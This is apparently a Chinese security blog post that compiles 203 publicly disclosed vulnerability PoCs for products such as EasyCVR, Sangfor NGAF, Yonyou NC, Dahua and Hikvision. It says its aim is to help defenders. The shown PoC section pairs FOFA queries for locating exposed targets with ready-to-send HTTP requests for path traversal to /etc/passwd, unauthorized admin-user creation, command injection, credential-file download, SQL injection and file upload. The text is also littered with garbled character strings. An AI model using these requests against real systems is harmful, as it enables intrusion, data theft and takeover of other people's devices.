互联网公开漏洞整理202309-202406
$ X6 [* g* I0 D% k3 Q1 k. g道一安全 2024-06-05 07:41 北京( q/ d9 }: F E- u
以下文章来源于网络安全新视界 ,作者网络安全新视界
/ s% s- n5 T8 [& {; ^3 L
: q1 }' G+ h1 n& Z k发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
h- x: y% h! Y O' d3 a6 {3 X, n; z6 \
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
2 w# i: k! Q& C5 F; m( g: w1 f6 L/ R0 I/ J) m3 j* ~; s1 | t
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
# D; F$ D& Z" [% `3 w- Y$ ]& v* A$ ~. ]
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。. Y. Z. S- w8 z1 n: Z
5 _" Z* x0 F: Z. z( E8 O合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
0 u0 {8 i8 d4 B5 {% y7 p) n# u2 R8 s' S1 M, G" S/ R
" B' G6 o/ r& L
声明
' _% V9 p& G/ e9 v+ `( b6 z# C; s$ B3 p
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。' M7 [: P( o7 y6 u1 P( t
. u2 v0 C8 h! v9 U& C0 Y有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。3 w, y; V. `; G8 u. V9 K
/ `& I' L0 t+ U7 Q- H) _! C0 G
" S7 O( V% J& R# A' H6 C
" ^ q8 l5 q: E目录
2 z) W/ ` @+ x- E7 \$ X) f$ n& h" r6 \2 ^' p4 e! X+ q; ^
01
( A$ B, C2 M. B6 n& g+ b4 z6 P6 t5 ?+ D. W/ d; ^
1. StarRocks MPP数据库未授权访问
; {5 s! ^6 ~( T g' O2. Casdoor系统static任意文件读取) \7 J q( `3 X8 J" e8 h3 H' a
3. EasyCVR智能边缘网关 userlist 信息泄漏
/ r- z) R$ {' W; ?4. EasyCVR视频管理平台存在任意用户添加) \ n, f1 K' N% a5 ^& j+ e
5. NUUO NVR 视频存储管理设备远程命令执行
1 ]$ h. b, c& C A+ ]6. 深信服 NGAF 任意文件读取
+ Y7 d/ Q3 I) L4 E( ^4 E7. 鸿运主动安全监控云平台任意文件下载
, v$ Y6 d* ~8 D4 s0 F* P! M8. 斐讯 Phicomm 路由器RCE+ C( H& ?* m# X6 I
9. 稻壳CMS keyword 未授权SQL注入
: l5 @) ?' ?2 v( |10. 蓝凌EIS智慧协同平台api.aspx任意文件上传: c' ]& [; a8 E
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入& z v5 t1 g* Z. Y, |+ c+ }
12. Jorani < 1.0.2 远程命令执行
6 c2 T! a. ^2 m, z" y3 w( ^13. 红帆iOffice ioFileDown任意文件读取* u* _7 u% E7 Y( _0 k; A4 i5 r8 i0 t
14. 华夏ERP(jshERP)敏感信息泄露, j6 K9 o% R8 u3 o# @. J* H/ A
15. 华夏ERP getAllList信息泄露
+ O$ l4 z& {! y8 m" R" I! _$ c; O' v16. 红帆HFOffice医微云SQL注入
( b2 |2 a& ^" n$ q" s17. 大华 DSS itcBulletin SQL 注入- f5 p& K1 z" @8 U! A3 C
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露6 f, v$ ^/ x/ v9 K p
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
6 P+ t2 G v) \+ ]; J0 @( g20. 大华ICC智能物联综合管理平台任意文件读取
$ Q) d* E* a+ P( I. V21. 大华ICC智能物联综合管理平台random远程代码执行4 F; q- m% a5 c1 D; z; |4 p
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
/ ^ H% l3 r. b# I" ~* G23. 大华ICC智能物联综合管理平台 fastjson远程代码执行5 f1 n6 u. t. b) v1 f! Z
24. 用友NC 6.5 accept.jsp任意文件上传
9 }- y6 M0 H/ T" w( z' }% j2 C25. 用友NC registerServlet JNDI 远程代码执行
$ f' k. u+ w/ @4 P26. 用友NC linkVoucher SQL注入! K! G& f" }: p% A0 Y$ {
27. 用友 NC showcontent SQL注入
2 N9 S$ [4 Z, e! Z, i2 L9 p5 S28. 用友NC grouptemplet 任意文件上传, C3 H! |* X2 W4 |* ]4 b5 y, G! K
29. 用友NC down/bill SQL注入7 u' o* K- p5 B- C+ B" m
30. 用友NC importPml SQL注入5 f( N. M/ i% m. L( G, |
31. 用友NC runStateServlet SQL注入- F& C3 y l2 n' r. x8 i. ^/ p2 Q$ Y( |+ D; u
32. 用友NC complainbilldetail SQL注入
, N& n6 {$ x I7 ]33. 用友NC downTax/download SQL注入
& ~: S3 H) z/ |34. 用友NC warningDetailInfo接口SQL注入3 h" P+ ~& ?: T" m0 m: m$ V
35. 用友NC-Cloud importhttpscer任意文件上传
. [" _6 T# T2 `5 i3 X% d/ a: R$ x36. 用友NC-Cloud soapFormat XXE* Z/ v; S3 D+ Q$ f4 F
37. 用友NC-Cloud IUpdateService XXE8 W1 c) a. \7 h4 ?
38. 用友U8 Cloud smartweb2.RPC.d XXE" a: L! V! I- H2 ~
39. 用友U8 Cloud RegisterServlet SQL注入
6 ^( n* Q% m: J3 ? X40. 用友U8-Cloud XChangeServlet XXE, Q% `) t+ E% b: A% @/ d$ ~# p( _
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入3 ^8 V/ }" H+ N) W; P8 o& N9 T/ C
42. 用友GRP-U8 SmartUpload01 文件上传
4 n& l& l: L0 \, V7 G43. 用友GRP-U8 userInfoWeb SQL注入致RCE
4 f9 h! M6 F/ U' V44. 用友GRP-U8 bx_dj_check.jsp SQL注入
o( x6 Z Y1 L6 D45. 用友GRP-U8 ufgovbank XXE
8 H, h8 a5 R! S, B3 p+ I46. 用友GRP-U8 sqcxIndex.jsp SQL注入' D: X& q, V: g& B$ D' x
47. 用友GRP A++Cloud 政府财务云 任意文件读取" W9 T; L9 i) s6 r3 ]
48. 用友U8 CRM swfupload 任意文件上传
o! k' ?: G+ x$ X49. 用友U8 CRM系统uploadfile.php接口任意文件上传, |2 K+ H* [/ Q1 V: j& s( U
50. QDocs Smart School 6.4.1 filterRecords SQL注入
4 ]( C4 w5 s/ g& ?51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入; {2 Q0 M6 F6 h7 K; `% ~, ^* j# x
52. 泛微E-Office json_common.php sql注入
! f: b+ ?: Z4 ~ J# Q" E' f# y% \5 D53. 迪普 DPTech VPN Service 任意文件上传6 I3 i2 J' u* K: n+ S8 R
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
# Q, c/ L- B$ t1 N55. 畅捷通T+ getdecallusers信息泄露8 V4 S3 ^% C2 Y7 g- {3 g! ~3 K6 Z
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
/ O- C g' Z' i6 U" L57. 畅捷通T+ keyEdit.aspx SQL注入) h( y& I& W7 A) H# \
58. 畅捷通T+ KeyInfoList.aspx sql注入, l2 @' y$ V0 N r6 ~& a# Q
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行" A3 c7 u$ n- r( f7 r. X3 V
60. 百卓Smart管理平台 importexport.php SQL注入
% }2 n7 ?7 g9 B* L, T3 N, l6 W61. 浙大恩特客户资源管理系统 fileupload 任意文件上传3 c! I2 J4 Y+ r; _
62. IP-guard WebServer 远程命令执行* z( A2 }; l% `! ^' e
63. IP-guard WebServer任意文件读取3 `: K0 M9 [% }0 T# Y# [8 p) \
64. 捷诚管理信息系统CWSFinanceCommon SQL注入6 [7 U4 @( Z, u
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过: ` m$ z! G& X* a
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入 M) r0 u! P; p. B/ ]' ?5 B% s
67. 万户ezOFFICE wpsservlet任意文件上传4 f: {8 u8 J" n) M8 m" L
68. 万户ezOFFICE wf_printnum.jsp SQL注入
y+ O0 s. d' @* P& X8 l# j69. 万户 ezOFFICE contract_gd.jsp SQL注入
! f8 J4 T! W* S# Z8 C H7 B. G5 {. [0 u70. 万户ezEIP success 命令执行. h" A. W& F2 Y# T+ u ^9 v* \
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入4 Y3 x" g% w# L2 i$ O
72. 致远OA getAjaxDataServlet XXE/ s3 H* ~; _8 i% [$ ?: n! A
73. GeoServer wms远程代码执行
1 v( r( ^# ~( V& J74. 致远M3-server 6_1sp1 反序列化RCE* b+ B$ z2 _& _7 r! {& O
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
4 k. j5 o* d. [# u% K! o76. 新开普掌上校园服务管理平台service.action远程命令执行
( L* W6 l4 M- v4 q7 T$ y( m) i8 r6 \# ?77. F22服装管理软件系统UploadHandler.ashx任意文件上传# Z6 t9 n6 x& a/ r
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传! m# c; \2 M6 M$ ~1 Y0 a) Y& ^% ~$ C
79. BYTEVALUE 百为流控路由器远程命令执行" T( L2 O# l8 q7 G3 V$ h' U
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
: X0 Z w& G% c+ E" y _2 K81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露- A8 {$ |9 ?. l l3 W% |, m0 U: M
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
7 M, d8 t$ }+ O2 q0 b6 [83. JeecgBoot testConnection 远程命令执行
" R8 ^7 r( d7 E( U* ^84. Jeecg-Boot JimuReport queryFieldBySql 模板注入) }. R2 G2 n+ f2 i1 n. Y F
85. SysAid On-premise< 23.3.36远程代码执行
/ G( Q* R: d$ y* }! n86. 日本tosei自助洗衣机RCE* h; h) C+ X3 u
87. 安恒明御安全网关aaa_local_web_preview文件上传4 V" u- D5 \. ]3 j+ ~0 N
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
0 F9 L- [5 p9 Y$ f' G( ^# r( e2 c5 X89. 致远互联FE协作办公平台editflow_manager存在sql注入
5 N) L/ X* X9 x" N+ ]90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
$ W1 A2 \' f% O0 H91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取 h9 s7 U% w* R, n* b+ S
92. 海康威视运行管理中心session命令执行$ U N7 X7 [, |% y% z
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
1 a. s) F6 ^% y) H; k( y# F7 b: B94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传" j( U% l9 I) P
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行) k9 [9 k$ p; P, |+ g% D
96. Apache OFBiz 18.12.11 groovy 远程代码执行
# a6 a/ j9 X7 w6 M# z97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行& \& _* ]$ f7 o, s3 B! m
98. SpiderFlow爬虫平台远程命令执行
' o1 m# {4 B" \( u& D' q! Z99. Ncast盈可视高清智能录播系统busiFacade RCE. j' }" ]4 p" K' H" @. v' @) H, b
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
( \5 v) K" Z# k( M% x* w8 d101. ivanti policy secure-22.6命令注入: w/ z* N2 ?+ n, [; O
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
! f1 f* F" D6 f* O j: N103. Ivanti Pulse Connect Secure VPN XXE& |& q! a% d6 E z
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露! x" z! [' A" h$ i
105. SpringBlade v3.2.0 export-user SQL 注入
9 M: K0 [( F, q106. SpringBlade dict-biz/list SQL 注入
/ m3 i: m1 ]: k, Z107. SpringBlade tenant/list SQL 注入
8 L# I! E$ k4 z, @4 @4 h108. D-Tale 3.9.0 SSRF m$ t1 B! k( p- z9 M" A. r0 g
109. Jenkins CLI 任意文件读取0 S. ^1 [( M1 _( M+ _
110. Goanywhere MFT 未授权创建管理员6 C# g3 z1 Q% I; S4 d
111. WordPress Plugin HTML5 Video Player SQL注入
) v# x0 g- n% T2 m" f112. WordPress Plugin NotificationX SQL 注入 \/ { _9 I5 \$ A7 p2 d i1 b
113. WordPress Automatic 插件任意文件下载和SSRF
) ^% T! b) } c1 G* y# {3 _* ~114. WordPress MasterStudy LMS插件 SQL注入) X6 G: G: S& M" _
115. WordPress Bricks Builder <= 1.9.6 RCE8 |* m! ~3 S0 _) v, _
116. wordpress js-support-ticket文件上传- ~4 w" |* I/ p- L% _* @
117. WordPress LayerSlider插件SQL注入. N5 s) }: ] H( q3 U# F! W6 T- ~& ~
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
W% F+ n! }# |+ u, N8 V6 ~% \119. 北京百绰智能S20后台sysmanageajax.php sql注入
* n+ d/ h4 k" n$ M& R! I6 h# }3 ]7 z2 ]120. 北京百绰智能S40管理平台导入web.php任意文件上传
) ^4 @+ |$ x( b4 B }+ Q/ D121. 北京百绰智能S42管理平台userattestation.php任意文件上传
+ q" y9 W2 D6 b, C122. 北京百绰智能s200管理平台/importexport.php sql注入3 h8 A, q2 u) O9 W! \1 z
123. Atlassian Confluence 模板注入代码执行- v# y, N; o. C$ |; K) h
124. 湖南建研工程质量检测系统任意文件上传$ Z- Q" R/ W% I) E. L0 e
125. ConnectWise ScreenConnect身份验证绕过: T* x: M [, z1 B6 N6 w/ G8 C; V# W
126. Aiohttp 路径遍历
# e3 t3 b2 C1 s127. 广联达Linkworks DataExchange.ashx XXE# G2 q! l0 y, Q O* y2 Z
128. Adobe ColdFusion 反序列化
* o+ ?* r7 c2 \9 M* i8 u129. Adobe ColdFusion 任意文件读取$ u8 R6 A3 D7 `) X
130. Laykefu客服系统任意文件上传: r5 y. v3 `9 p6 I2 a7 O
131. Mini-Tmall <=20231017 SQL注入
6 m W8 J' x1 L9 S/ C3 d132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
" q+ b6 V% a1 J' h0 F; u133. H5 云商城 file.php 文件上传
7 l+ ^7 {2 k `1 A8 W* n3 J, d9 W134. 网康NS-ASG应用安全网关index.php sql注入
; c6 A2 Q5 I; f! t T135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入+ V8 t E( Z; U% i4 J* M
136. NextChat cors SSRF
! l3 j5 V% u1 ?, g# J( \' _137. 福建科立迅通信指挥调度平台down_file.php sql注入
( m! ^7 i1 B! _+ x! ] K" l/ ^# T- H138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
7 N/ v" e/ N4 b139. 福建科立讯通信指挥调度平台editemedia.php sql注入: q& ]& v; ]* u8 r, X! W9 _% ~
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
1 y3 [ I8 u. D1 |* f141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入3 ]3 t2 m* r+ d, `3 P! U
142. CMSV6车辆监控平台系统中存在弱密码
0 Y' u) q1 [/ W# e4 y143. Netis WF2780 v2.1.40144 远程命令执行
6 G( Q o) S: c) h; a144. D-Link nas_sharing.cgi 命令注入3 C4 {; w% e; `$ O7 c: A
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入8 {. J( o# X0 b. @& B& }; z
146. MajorDoMo thumb.php 未授权远程代码执行
* A u/ M+ h4 @3 x8 o- p147. RaidenMAILD邮件服务器v.4.9.4-路径遍历% Z" G4 O* B9 [7 x3 |5 d
148. CrushFTP 认证绕过模板注入
& q- j' y" K- J) ~+ q0 T0 D0 G149. AJ-Report开源数据大屏存在远程命令执行* H! U' G* y( t
150. AJ-Report 1.4.0 认证绕过与远程代码执行
+ `9 R7 Y' X+ F l151. AJ-Report 1.4.1 pageList sql注入
( |8 F3 l z( ~8 l1 z- K152. Progress Kemp LoadMaster 远程命令执行
2 z7 ]3 y9 J- j7 ~5 Q: S1 |153. gradio任意文件读取
! I( G: Q: Y' W x# @154. 天维尔消防救援作战调度平台 SQL注入
: Y; b" B( z) `, z. V }155. 六零导航页 file.php 任意文件上传4 O- J2 @ w# \* D g9 y1 g
156. TBK DVR-4104/DVR-4216 操作系统命令注入
& Z0 n; s1 u: K& U3 \157. 美特CRM upload.jsp 任意文件上传8 Y6 `6 Z' q5 M& r7 {( j1 A) o
158. Mura-CMS-processAsyncObject存在SQL注入+ l9 E5 g7 a- l2 g/ e" J
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
. P' P8 o4 x$ t+ K; J) C160. Sonatype Nexus Repository 3目录遍历与文件读取
5 {9 E7 F v( o. _- z" b161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传9 U M0 F6 J W$ G
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
3 u# T. D4 \7 r, Q! L4 o3 p% s5 z163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
/ Y9 M: ^! d1 A; J; \& I' ~164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
# _' m+ h& f/ ?# B9 ?* w3 S165. OrangeHRM 3.3.3 SQL 注入3 n" w+ U' Z/ v
166. 中成科信票务管理平台SeatMapHandler SQL注入 d B& q" c2 N6 m
167. 精益价值管理系统 DownLoad.aspx任意文件读取& z8 u% j4 g& d; j
168. 宏景EHR OutputCode 任意文件读取 l) B2 j: W) G
169. 宏景EHR downlawbase SQL注入
( @' c% O" ~" ~% x$ f+ V) Q( h4 d/ o170. 宏景EHR DisplayExcelCustomReport 任意文件读取
, {5 S( e- A* D: R. _: |171. 通天星CMSV6车载定位监控平台 SQL注入0 [8 a" b5 z* N4 _& R3 I
172. DT-高清车牌识别摄像机任意文件读取
* x3 l- N* T4 ]: a. @; {) R' q173. Check Point 安全网关任意文件读取
) N! T' C- |+ a, r4 I' }174. 金和OA C6 FileDownLoad.aspx 任意文件读取
: Z2 h9 b _: X3 F+ J5 q175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入( W, C8 ?2 Z3 M5 k7 W
176. 电信网关配置管理系统 rewrite.php 文件上传/ [7 _6 G( l- D- Y/ t, J3 W
177. H3C路由器敏感信息泄露
( |- V+ j4 c. F- B5 h178. H3C校园网自助服务系统-flexfileupload-任意文件上传3 v, k/ k. \; `* p" S% Z
179. 建文工程管理系统存在任意文件读取
& x: |3 O4 I# n- T8 Y. @180. 帮管客 CRM jiliyu SQL注入8 s; i6 o Z9 O9 f5 W
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
* q, W {7 j" l* N4 k182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建2 q6 Z$ A9 v# S/ q# Z
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入) n. l/ _) J! r2 J9 E( Q
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
4 y! Y1 B+ X$ k' b. ~3 ^185. 瑞友天翼应用虚拟化系统SQL注入" z5 e3 A! f: \6 l' \
186. F-logic DataCube3 SQL注入7 P7 d. ?) r& x/ Y# p! o. {, Z
187. Mura CMS processAsyncObject SQL注入
9 n; F" V0 j5 L188. 叁体-佳会视频会议 attachment 任意文件读取
. r D3 [# S& o u9 w7 i6 f [2 h189. 蓝网科技临床浏览系统 deleteStudy SQL注入+ V- e# m/ H2 V
190. 短视频矩阵营销系统 poihuoqu 任意文件读取, r& m: F, ]9 K: n( Q h6 T$ `* E
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入- J' v" Y4 S' Y. D. I
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
. m4 ^7 D o* l: q8 v. J: ~193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行6 i3 Z" R9 }5 h
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
% }( `5 I W- Q% q) h7 i: ]7 t+ A. q195. 飞鱼星上网行为管理系统 send_order.cgi命令执行, Q( T1 e* W- V0 c _
196. 河南省风速科技统一认证平台密码重置9 o/ M9 T, @6 r- w+ F8 H
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入- D' }6 E# ^3 m9 V; V
198. 阿里云盘 WebDAV 命令注入
: u9 g6 t) l# v6 O8 }9 l) W199. cockpit系统assetsmanager_upload接口 文件上传
# S( V M" C: S5 B e( w8 m200. SeaCMS海洋影视管理系统dmku SQL注入& H8 c+ t: B3 N) d, l
201. 方正全媒体新闻采编系统 binary SQL注入 W2 T' K7 {3 T6 c
202. 微擎系统 AccountEdit任意文件上传: `( |% V+ R7 C4 e+ s$ d' ?
203. 红海云EHR PtFjk 文件上传# {) U/ b [5 N
5 F; I5 @! ]9 ?: P1 Z8 L$ H
POC列表" o) }/ Q) t3 J/ }
+ _. X8 ?* K1 w02
* n3 D! a. t8 b8 ]4 U( x
7 E/ v: r7 e5 i( _1. StarRocks MPP数据库未授权访问
0 A+ m4 G! G) c% u, ?6 `; K" NFOFA :title="StarRocks"
4 R- G' W n5 \, {9 NGET /mem_tracker HTTP/1.1) s: J2 k: H: O8 t
Host: URL$ E0 p- g6 Z& p9 K9 Y5 p S
) I; @' H0 q- N7 T7 l
6 J1 V; I5 i: w% C1 T; F2. Casdoor系统static任意文件读取
$ u! @2 }. l& t# E+ {FOFA :title="Casdoor") U! N5 R- v2 U: J/ _# W9 B* O/ d5 k o
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
8 U/ {3 s. o3 B% D# o3 QHost: xx.xx.xx.xx:99995 x2 i1 z$ o2 z+ c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36+ o' ~5 J9 f# q, m
Connection: close: H- l% x" E/ l+ X+ A; D8 ?
Accept: */*# Y& b9 |) [ y& x8 p. \- H/ p, [$ [$ |" a
Accept-Language: en+ g* a' M9 u# N+ y+ N
Accept-Encoding: gzip% m: R! ]9 l+ ]% V/ ?/ Y) d9 h7 q6 I
$ E+ A2 k9 {. T# w& d
8 _, N l5 C, ^2 l$ h; v3 [ b3 u, ]' [3. EasyCVR智能边缘网关 userlist 信息泄漏
/ ^9 p2 r: S% ^8 }6 qFOFA :title="EasyCVR"
6 z4 T; P! U' YGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1 J4 O$ Z3 p0 k6 o
Host: xx.xx.xx.xx
: P3 z9 s% O4 L" u7 k; \7 c% |+ Q! ^: v, V m. M
: |1 y! F6 \4 m5 j7 ?) G5 o* _
4. EasyCVR视频管理平台存在任意用户添加9 f0 L6 I4 B6 Z
FOFA :title="EasyCVR"* l+ x( j- W/ s" r+ M2 ~
( _" \- x7 s/ S7 y! A9 ^2 P6 I- Xpassword更改为自己的密码md5
! [; [7 P* E6 \ E+ f6 cPOST /api/v1/adduser HTTP/1.1
2 x/ S i' d: ]- OHost: your-ip) z9 s6 N8 g& a& u% u8 B) l9 v1 M
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
/ i2 m$ D1 K" v/ I% M% A$ z+ v& X; J1 w# d" x
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
& E- p+ }& z; X, h4 j' T% [$ d6 Q/ v. d
5 w" ^7 g! f: s. v0 _5. NUUO NVR 视频存储管理设备远程命令执行4 y) P0 T! y9 T. T
FOFA:title="Network Video Recorder Login") F9 ?! A! k# c! S5 X
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
) |$ ?! Z$ p- ^( [2 q; X8 H O" lHost: xx.xx.xx.xx
4 V3 z: O) L1 c, Q! [: C% R
$ `1 u, i9 s3 [4 ^
6 x* K3 y4 Z7 r D- O$ L; |0 a6. 深信服 NGAF 任意文件读取
/ q u: B. {" m% b9 iFOFA:title="SANGFOR | NGAF" B- Y+ I/ l" C/ }
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
8 _. `5 U3 C- v, t' B6 ]Host:
* s R7 f4 e6 n" c' I- l; @3 v
$ w/ Z% @9 P) _. x+ t
9 ~3 j8 U7 p$ v) K7 w7. 鸿运主动安全监控云平台任意文件下载0 }/ t( ]; }9 U( y
FOFA:body="./open/webApi.html"
) v; z2 H/ |$ f* H( l, ?GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
' O$ X: i: {7 D: N9 m5 sHost:
: u5 ~% _+ J! F, W, D/ e2 b1 D
6 P# j) ?6 I4 Z1 A& B# b/ t' I$ w6 C8 j- O$ e; w2 w6 L! e
8. 斐讯 Phicomm 路由器RCE
4 ?7 A6 Z1 G1 G2 ^+ a' D4 eFOFA:icon_hash="-1344736688"9 j. U- O& V/ j
默认账号admin登录后台后,执行操作 E' t- s# M, P
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.13 I* r6 d" I( y P" v
Host: x.x.x.x
& T5 U5 ^, l* \5 n* G* s' u. K: ACookie: sysauth=第一步登录获取的cookie8 r a" A2 ~) [5 v/ R
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
3 A, _" x m' x9 `( ZUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
" ?, l1 [7 \) @! D" g4 ~1 b4 t
" u: V4 }' ~8 Q4 I( B" u" w------WebKitFormBoundaryxbgjoytz- B; B2 g& k; J" d2 P
Content-Disposition: form-data; name="wifiRebootEnablestatus"
7 c% `+ V% h& e, Z6 e: G% H: r8 Z3 k. {' c
%s
( J K1 ~. J* s" }( z( r; U------WebKitFormBoundaryxbgjoytz1 D! W/ C+ m8 @6 P/ s: e
Content-Disposition: form-data; name="wifiRebootrange"
* p6 F% t5 Q" ?: w' H
$ i' y& X( f* v9 |) E* r! z12:00; id;; @! q. K( ?+ o9 C3 k
------WebKitFormBoundaryxbgjoytz+ U9 b" }( R6 c/ C' Q
Content-Disposition: form-data; name="wifiRebootendrange"
. r. `( j; M( Z) j7 X$ L9 R6 h _! }/ T* H* W* b
%s:' k! P% E2 e" u: Q8 K
------WebKitFormBoundaryxbgjoytz, q/ X9 |& P; _3 n
Content-Disposition: form-data; name="cururl2"
% }% V0 h9 c8 {! i. b: G. a& A
6 `# z" a1 L, x: V! |% K& T/ _- {------WebKitFormBoundaryxbgjoytz--- r+ X3 P. U+ ^. }
* ]6 Y/ R2 |, j- D% ^4 X8 i0 g! W9 D) ?
9. 稻壳CMS keyword 未授权SQL注入8 t* i5 }6 p- N- z: }& |/ g4 K3 {: e6 z
FOFA:app="Doccms"
, A, M( m4 ? k7 V) J% HGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1$ @3 D6 D; V X: y
Host: x.x.x.x
+ e/ }# b: x& |/ d- V( Q
" w0 n* Y/ O$ p7 b) n. T ^- n. L7 L
payload为下列语句的二次Url编码$ g/ x' s' p+ _4 p2 m
' U" ?, i% \0 x: u! @) N1 n
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))# P4 _* I; |- b
- W. w2 M ]" ~
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传$ K8 Z5 {1 I5 S2 v, m3 k+ r
FOFA:icon_hash="953405444"
* L# u% v) [' s2 d
3 M: ?4 a( H; v文件上传后响应中包含上传文件的路径( P* [2 N$ N' U' t
POST /eis/service/api.aspx?action=saveImg HTTP/1.12 H# d' F! U' ?; `/ T3 a+ n/ k
Host: x.x.x.x:xx
8 ?0 c8 t S5 g' T' y# ]7 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
+ a. C# |+ U9 J* [Content-Length: 197
O! F6 R( z$ T8 i' w* E0 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9; X |2 B$ o9 a5 ~2 }! h
Accept-Encoding: gzip, deflate
8 D c- o+ H4 W6 s# |' F+ i0 e9 PAccept-Language: zh-CN,zh;q=0.9
. [# J" q' w8 a l. d7 Y% V( JConnection: close0 ]( K- Q" O* [# p' G7 s8 I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
- y' `3 Y. B9 F* }' Q
3 i2 F' `# R( M$ S# J, |9 t! j; z------WebKitFormBoundaryxdgaqmqu
$ u, ^. C9 q$ X$ x+ r; h0 C* LContent-Disposition: form-data; name="file"filename="icfitnya.txt"8 M# D' g7 E% \0 v
Content-Type: text/html
_ X/ [4 O8 b. `4 s: A* B& |5 _+ v5 A, V4 r3 U
jmnqjfdsupxgfidopeixbgsxbf
; t* \" D: U5 z! |% b. F5 L+ v------WebKitFormBoundaryxdgaqmqu--
5 p4 g: E# ~# M; S) w: ]5 e
5 ` O$ Y5 v ?% u2 U) y B; _
